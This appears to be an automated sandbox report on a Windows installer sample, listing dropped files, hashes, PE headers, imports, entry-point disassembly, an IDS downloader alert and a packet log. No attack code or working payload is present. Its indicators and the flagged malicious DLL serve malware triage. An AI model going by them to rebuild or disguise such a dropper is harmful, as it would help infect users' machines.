                                    SSDEEP:96:wON5j7GREzTpUgM/ZKOWP9/k8qAOh3R7I4ARa3P:LGREzTpOkqAqsa3P
                                    MD5:F8426FDB8764486488BCF8B38DD484A4
                                    SHA1:541158FC40283C0219922CDD651B6E57D9EAAF4F
                                    SHA-256:AB87D4BFFBDE0F6952906169AD7A87BEAB87EFAD84C3460920A243BEA659D754
                                    SHA-512:ACC54CAE6D7668A05ABD9C2A293E5CA8E72B1CF177AB0DEC6ADCB2130D252E738608DD8F3B13CAB1B76FB78AFE0E2395182F6A9EA499AC436755C45404ECD9DE
                                    Malicious:false
                                    Process:C:\Users\user\Desktop\anziOUzZJs.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):3551
                                    Entropy (8bit):4.862590046832443
                                    Encrypted:false
                                    SSDEEP:96:88xtOpIIa/raEG78gsYv2XNK1Fpq+0bkpzW6/PNx1g:884I5/mEGAgLvWNK1XdzWklg
                                    MD5:1F22EB9DB671B05ED5C08F8DD00D5C48
                                    SHA1:8A7959384C2442945087D67CFE129752D2DA87FA
                                    SHA-256:191412AF797D357AE97C55047CB5A7427BED940E025D39ABC89E862177A5DAF6
                                    SHA-512:8EBF76314ACBDDECFD19849ACE9F4EAA9E2B1D4E5E7C370479707B96D139EC2800F719420EB14342394F6679C732BB1C4BC741C2F7D45DA772FD75C5A21CE5FE
                                    Malicious:false
                                    Process:C:\Users\user\Desktop\anziOUzZJs.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):2928
                                    Entropy (8bit):4.804862127878948
                                    Encrypted:false
                                    SSDEEP:48:1t65YBNor6XPCY68XvqwXPZRVgb6DbKUtVEgTNMN78o26Z+V39Jwnqmv9V7J:1RNJXPC/8Xvqwp9bNq12Q+V39AqY9V7J
                                    MD5:612F90BBC9347DDEFFB620E1DD4E730B
                                    SHA1:91CD3FB4025685AC7098CD4BD3F822317B192583
                                    SHA-256:A5AED468547F93B42C66FC193F770D6E41B5F4701C0E6FC0BBA48C1589276933
                                    SHA-512:9A0DBEF78C25891D747CC211E53CAEBC60159FC6630B5A1EFBF7436A494E7F9A33E3BB313E25A44C3778DF440D5C94377BC4416F2C21934B83A9A07D35246ACE
                                    Malicious:false
                                    Preview:.......I...............y..v..t..h......`...........q......]".}...K...........N.......M.a......D..2.._.1^x.v>...........O.....j....Z.`....c..............^....5.........w........C........1...a.........m..........H..q..........L{.....S...vI..c..;...;...6.......<..KA...............a.....r.J..g.......z.zN.........~.......>......2.p.......Nr..o.......6a..N.............)...*..)5...f..}.Q.k>hB.].=*............u...Q.......:...2..........|u.a...@...........].J.........^.1..'...;..Y.......2.........y..f...............&...z...o......\..K..t..m.......d...g......~d....O.>..?0......r..(.H..........G...............q.....G.b...? ...........j.....$.,e......V...........+j..........]`S...S.a......>.........I....W..?...Tm...<..k....................!...x...M..6...S..=...........'t......=......2.......).....$..4.&..L...p.....................8....U?.h.o.......W.......................Y............w..g.....[....Q.......y.....l.a....{......5P.......N........N..]...[E.....~..........<......(...............
                                    Process:C:\Users\user\Desktop\anziOUzZJs.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):3768
                                    Entropy (8bit):5.024527606885987
                                    Encrypted:false
                                    SSDEEP:96:XyaOKaw+PWpHXjGU5Nvyzt8B6XNPpaU/Ob/APQiQL:yw+PWHXSUoguamQR
                                    MD5:31030FC12E7662A05E09F8713E5188E4
                                    SHA1:8BB2E7F32CADE158C981EC302C80B31C3DC56327
                                    SHA-256:CE956FF5404172303308409C64FD6E20DD602CC4D2DDAB1EF183F0B9E4DEACC7
                                    SHA-512:BC95831C3CEBD16786CB74ECC121D7048E48BFDEE8E0EFEBBAE3406E19AFBF54121EB6AC83134B7D70FEADFE34CF4D9852EA4C26735C28762BBB5051A757CF03
                                    Malicious:false
                                    Preview:.[F......d...E...<..I.h........W....@....w..t.....(.................!...........=....|-......o...................|..m........f.J.8....E8.....yX.y.....S.....[.......3..H..?......'......(.>.....1....../....:...".....%....T...O......).....Sj....N.....m....).K\.......................1...U.....h..V..Y.A..<..........*.?.....j.....c.............~.......G.......G.......sj......"..........."...C.....m.Tr..l<.......J...<...........O...........G...................4..M./.N.a.......qe.....2....a........i...........R...gn.....n..'.w.................[..._..$..A...C.........>..9.......U....O.......3.....N..........O..........'....\.Q..+...._.....o..c.+.Ei.2...................k.U..B.......................|......w....A.e................OU..& _...4..........O.....L.....)...}.........f.............U.....<.F........S...k..3........ .....9............aE.[....2......]P*.......................u...................Z6,...@.=$...e.!.................X..U..@$...........L...3................_..`..q......,
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Users\user\Desktop\anziOUzZJs.exe
                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                    Category:modified
                                    Size (bytes):7680
                                    Entropy (8bit):5.183569676039618
                                    Encrypted:false
                                    SSDEEP:96:8eE0AKTIfv7QCUsthvNL85s4lk38Eb3CDfvEh8uLzqkwnLiEQjJ3KxkP:tWBfjbUA/85q3wEh8uLmjLpmP
                                    MD5:350A507070ED063AC6A511AEEF67861A
                                    SHA1:CF647B90A1212E090F1D236D1B50A5010CBF3BAE
                                    SHA-256:5C66ABD3F06EAA357ED9663224C927CF7120DCA010572103FAA88832BB31C5AB
                                    SHA-512:CDE5747CC8539625E4262AFAD9699CE4E8325133D7ED7F47B9D46989A7AA0D2CC2488441ACC57368F485EF1DD3E02B9EF2FAA642F68E9F1DB53A39E0F896D468
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 0%
                                    Joe Sandbox View:
                                     • Filename: PTFE Coated Butterfly Valve Picture·pdf.exe, Detection: malicious
                                     • Filename: bPYR660y5o.exe, Detection: malicious
                                     • Filename: uQP25xP5DH.exe, Detection: malicious
                                     • Filename: bPYR660y5o.exe, Detection: malicious
                                     • Filename: uQP25xP5DH.exe, Detection: malicious
                                     • Filename: R7MPO3ijgz.exe, Detection: malicious
                                     • Filename: tNET06vnWS.exe, Detection: malicious
                                     • Filename: R7MPO3ijgz.exe, Detection: malicious
                                     • Filename: 0bRKaeNvVp.exe, Detection: malicious
                                     • Filename: tNET06vnWS.exe, Detection: malicious
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......4.W.p.9Cp.9Cp.9Cp.8C@.9C..dCy.9C$..Cq.9C$..Cq.9C..=Cq.9CRichp.9C........PE..L...oc.W...........!......................... ...............................P.......................................$....... ..d............................@....................................................... ...............................text...3........................... ..`.rdata....... ......................@..@.data...$....0......................@....reloc..l....@......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Users\user\Desktop\anziOUzZJs.exe
                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):9728
                                    Entropy (8bit):5.067450252961874
                                    Encrypted:false
                                    SSDEEP:96:oyqZ4zC5RH3cXX1LlYlRowycxM2DjDf3GEst+Nt+jvDYx4yqndYHnxss:oyq+CP3uKrpyREs06YxKdGn
                                    MD5:13B6A88CF284D0F45619E76191E2B995
                                    SHA1:09EBB0EB4B1DCA73D354368414906FC5AD667E06
                                    SHA-256:CB958E21C3935EF7697A2F14D64CAE0F9264C91A92D2DEEB821BA58852DAC911
                                    SHA-512:2AEEAE709D759E34592D8A06C90E58AA747E14D54BE95FB133994FDCEBB1BDC8BC5D82782D0C8C3CDFD35C7BEA5D7105379D3C3A25377A8C958C7B2555B1209E
                                    Malicious:false
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 0%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|..c8O`08O`08O`08Oa0.O`0.@=05O`0llP0=O`0.If09O`0.od09O`0Rich8O`0........PE..L...qc.W...........!......... ...............0.......................................................................6..k....0.......`.......................p.......................................................0...............................text...Q........................... ..`.rdata..{....0......................@..@.data........@......................@....rsrc........`....... ..............@..@.reloc..l....p......."..............@..B................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Users\user\Desktop\anziOUzZJs.exe
                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):6656
                                    Entropy (8bit):4.994861218233575
                                    Encrypted:false
                                    SSDEEP:96:U7GUxNkO6GR0t9GKKr1Zd8NHYVVHp4dEeY3kRnHdMqqyVgNN3e:mXhHR0aTQN4gRHdMqJVgNE
                                    MD5:B648C78981C02C434D6A04D4422A6198
                                    SHA1:74D99EED1EAE76C7F43454C01CDB7030E5772FC2
                                    SHA-256:3E3D516D4F28948A474704D5DC9907DBE39E3B3F98E7299F536337278C59C5C9
                                    SHA-512:219C88C0EF9FD6E3BE34C56D8458443E695BADD27861D74C486143306A94B8318E6593BF4DA81421E88E4539B238557DD4FE1F5BEDF3ECEC59727917099E90D2
                                    Malicious:false
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 0%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........d..7..7..7..7..7,..7..7..7..7..7..7Rich..7........PE..L...rc.W...........!......................... ...............................P.......................................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..,.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Users\user\Desktop\anziOUzZJs.exe
                                    File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
                                    Category:dropped
                                    Size (bytes):1426
                                    Entropy (8bit):3.1292151835408184
                                    Encrypted:false
                                    SSDEEP:24:8KrxWLgD4/BV02DeVSjqVU9y+pddu5wA2M2Fdqy:868gDszheMq6xpPu5v2MCUy
                                    MD5:01ADDCEE183BD2F0071BB09D6F4FACE2
                                    SHA1:2128A70A819CE630D219136BA741098032C6AE82
                                    SHA-256:C968F34B449D3B2E778E22D4D5CEA98DE9684574D3012F3B3DEDAB8C7113D57A
                                    SHA-512:9C1BB3055AF107C4757980B84EBF59E0022F74B352BB8A7409DC52E4F1FB2880FB278F9DC0674932AB98C09F6B6BA4C6756BD69F3A87A5E7346EA6923273F5B8
                                    Malicious:false
                                    Preview:L..................F........................................................m....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....\.1...........user.D............................................f.r.o.n.t.d.e.s.k.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....t.1...........Printer Shortcuts.T............................................P.r.i.n.t.e.r. .S.h.o.r.t.c.u.t.s... .`.1...........triorchism..F............................................t.r.i.o.r.c.h.i.s.m.....`.2...........hvidte.pal..F............................................h.v.i.d.t.e...p.a.l.......L.....\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.M.i.c
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:JSON data
                                    Category:dropped
                                    Size (bytes):55
                                    Entropy (8bit):4.306461250274409
                                    Encrypted:false
                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                    Malicious:false
                                    Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:MS Windows registry file, NT/2000 or above
                                    Category:dropped
                                    Size (bytes):1835008
                                    Entropy (8bit):4.4175582534470115
                                    Encrypted:false
                                    SSDEEP:6144:ncifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuNO5+:ci58oSWIZBk2MM6AFB4o
                                    MD5:BC2D0FEB50A1962A28590A07F76088C9
                                    SHA1:665D4557AB2E68315FF0FF6B4C2F9D2226D0D247
                                    SHA-256:9B774FB57AF816260BBAE71D49DB5933144FCBC3CA51C152EDDE83D67F674A6D
                                    SHA-512:0C7C6B5B87C414F74357299202E94F8BF20CC1E468753E2364878A472D48CC9F7680C38207A6C93F56E8751EAA004504B6560CB6A471DC035E5BFFF059F01E4F
                                    Malicious:false
                                    Preview:regfF...F....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..n.M...............................................................................................................................................................................................................................................................................................................................................).x.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                    Entropy (8bit):7.664240005553691
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:anziOUzZJs.exe
                                    File size:469'904 bytes
                                    MD5:61bdbe7854f1572202f7916cf7f03616
                                    SHA1:e03a3385bc0cd5869c2a8cc72c80f4115b7b7945
                                    SHA256:39f1703e13bdc112f4ffe9240f70cd5eb5b07cc218e6b22a8d58e4dcfaadd0a1
                                    SHA512:b9b41ede8456e65669ddf068bd6d277d60a7f2d233fa947636f998e9f77bc9be72a4b27884c9cc1bb979bbc0a8488ba8efa32375258492eb712ed864eca3a9c6
                                    SSDEEP:12288:rKYi/LYz3kRV6h/3lObHOjeP/AxozXkYD:GFDg3ZhvlwHWiYx2UYD
                                    TLSH:24A4025627D640D6F87946F1442356269363B92F18A18A8FFE5CB6FB2C74303C41FA2B
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F...v...F...@...F.Rich..F.........................PE..L....c.W.................^.........
                                    Icon Hash:3f775d2d1c1e5963
                                    Entrypoint:0x4030d9
                                    Entrypoint Section:.text
                                    Digitally signed:true
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x5795638D [Mon Jul 25 00:55:41 2016 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:b78ecf47c0a3e24a6f4af114e2d1f5de
                                    Signature Valid:false
                                     Signature Issuer:E=Baggrund@Dawned.Fou, O=Overophedendes, OU="Glippende Unadaptedness ", CN=Overophedendes, L=Saint-Étienne, S=Auvergne-Rhône-Alpes, C=FR
                                    Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                    Error Number:-2146762487
                                     Not Before, Not After
                                     • Not Before: 18/12/2023 09:04:43, Not After: 17/12/2026 09:04:43
                                     Subject Chain
                                     • E=Baggrund@Dawned.Fou, O=Overophedendes, OU="Glippende Unadaptedness ", CN=Overophedendes, L=Saint-Étienne, S=Auvergne-Rhône-Alpes, C=FR
                                    Version:3
                                    Thumbprint MD5:FE17DFB774F3828E88DF777AF008BC42
                                    Thumbprint SHA-1:306D70325EC8E37C40DE5971AD7CAE1BDC91984C
                                    Thumbprint SHA-256:9C43B3018A2CB0A9FCDC9B9851216D5E764E08B107F4C225C14E7875639B2F50
                                    Serial:1BF58D5C0752B2550C09722CFFD93C395B90EDE2
                                    Instruction
                                    sub esp, 00000184h
                                    push ebx
                                    push esi
                                    push edi
                                    xor ebx, ebx
                                    push 00008001h
                                    mov dword ptr [esp+18h], ebx
                                    mov dword ptr [esp+10h], 00409198h
                                    mov dword ptr [esp+20h], ebx
                                    mov byte ptr [esp+14h], 00000020h
                                    call dword ptr [004070A8h]
                                    call dword ptr [004070A4h]
                                    cmp ax, 00000006h
                                    je 00007F18188C69F3h
                                    push ebx
                                    call 00007F18188C9961h
                                    cmp eax, ebx
                                    je 00007F18188C69E9h
                                    push 00000C00h
                                    call eax
                                    mov esi, 00407298h
                                    push esi
                                    call 00007F18188C98DDh
                                    push esi
                                    call dword ptr [004070A0h]
                                    lea esi, dword ptr [esi+eax+01h]
                                    cmp byte ptr [esi], bl
                                    jne 00007F18188C69CDh
                                    push ebp
                                    push 00000009h
                                    call 00007F18188C9934h
                                    push 00000007h
                                    call 00007F18188C992Dh
                                    mov dword ptr [00423704h], eax
                                    call dword ptr [00407044h]
                                    push ebx
                                    call dword ptr [00407288h]
                                    mov dword ptr [004237B8h], eax
                                    push ebx
                                    lea eax, dword ptr [esp+38h]
                                    push 00000160h
                                    push eax
                                    push ebx
                                    push 0041ECC8h
                                    call dword ptr [00407174h]
                                    push 00409188h
                                    push 00422F00h
                                    call 00007F18188C9557h
                                    call dword ptr [0040709Ch]
                                    mov ebp, 00429000h
                                    push eax
                                    push ebp
                                    call 00007F18188C9545h
                                    push ebx
                                    call dword ptr [00407154h]
                                    Programming Language:
                                    • [EXP] VC++ 6.0 SP5 build 8804
                                     Name | Virtual Address | Virtual Size | Is in Section
                                     IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
                                     IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7428 | 0xa0 | .rdata
                                     IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x34000 | 0x15800 | .rsrc
                                     IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
                                     IMAGE_DIRECTORY_ENTRY_SECURITY | 0x712e8 | 0x18a8 | -
                                     IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | -
                                     IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
                                     IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
                                     IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
                                     IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
                                     IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
                                     IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
                                     IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x298 | .rdata
                                     IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
                                     IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
                                     IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
                                     Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                     .text | 0x1000 | 0x5c5b | 0x5e00 | 905b5e59c06f35acf133c0788daacce5 | False | 0.6603640292553191 | data | 6.411456379497882 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                     .rdata | 0x7000 | 0x1246 | 0x1400 | 43fab6a80651bd97af8f34ecf44cd8ac | False | 0.42734375 | data | 5.005029341587408 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                     .data | 0x9000 | 0x1a7f8 | 0x400 | 00798d060e552892531c88ed1710ae2c | False | 0.6376953125 | data | 5.108396988130901 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                     .ndata | 0x24000 | 0x10000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                     .rsrc | 0x34000 | 0x15800 | 0x15800 | fd0be0fc5cfb383174172a3f4e7ed15d | False | 0.36346293604651164 | data | 5.001547188153925 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                     Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                     RT_ICON | 0x342c8 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.32665917425766
                                     RT_ICON | 0x44af0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.4768672199170125
                                     RT_ICON | 0x47098 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.5201688555347092
                                     RT_ICON | 0x48140 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.6012295081967213
                                     RT_ICON | 0x48ac8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.651595744680851
                                     RT_DIALOG | 0x48f30 | 0x100 | data | English | United States | 0.5234375
                                     RT_DIALOG | 0x49030 | 0x11c | data | English | United States | 0.6056338028169014
                                     RT_DIALOG | 0x49150 | 0xc4 | data | English | United States | 0.5918367346938775
                                     RT_DIALOG | 0x49218 | 0x60 | data | English | United States | 0.7291666666666666
                                     RT_GROUP_ICON | 0x49278 | 0x4c | data | English | United States | 0.8157894736842105
                                     RT_VERSION | 0x492c8 | 0x1f4 | data | English | United States | 0.55
                                     RT_MANIFEST | 0x494c0 | 0x33d | XML 1.0 document, ASCII text, with very long lines (829), with no line terminators | English | United States | 0.5536791314837153
                                     DLL | Import
                                     KERNEL32.dll | SetEnvironmentVariableA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, GetFileAttributesA, SetFileAttributesA, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, ExitProcess, GetFullPathNameA, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, CloseHandle, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, lstrcmpiA, SetFileTime, lstrcmpA, ExpandEnvironmentStringsA, GlobalUnlock, GetDiskFreeSpaceA, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc
                                     USER32.dll | ScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
                                     GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                     SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                                     ADVAPI32.dll | RegDeleteKeyA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegEnumValueA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                     COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                     ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
Language of compilation system | Country where language is spoken
English | United States
Timestamp | Protocol | SID | Signature | Severity | Source Port | Dest Port | Source IP | Dest IP
2024-09-02T16:20:41.195073+0200 | TCP | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 49726 | 443 | 192.168.2.7 | 142.250.184.238
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                    Sep 2, 2024 16:20:44.692212105 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.692222118 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.692272902 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.692754030 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.692804098 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.692816973 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.692877054 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.695158005 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.695219994 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.695230007 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.695271015 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.695537090 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.695595026 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.695602894 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.695647955 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.699188948 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.699275970 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.700145960 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.700201035 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.700213909 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.700262070 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.704432964 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.704503059 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.704515934 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.704560995 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.705342054 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.705390930 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.705398083 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.705445051 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.709017038 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.709095001 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.709139109 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.709228992 CEST49729443192.168.2.7142.250.181.225
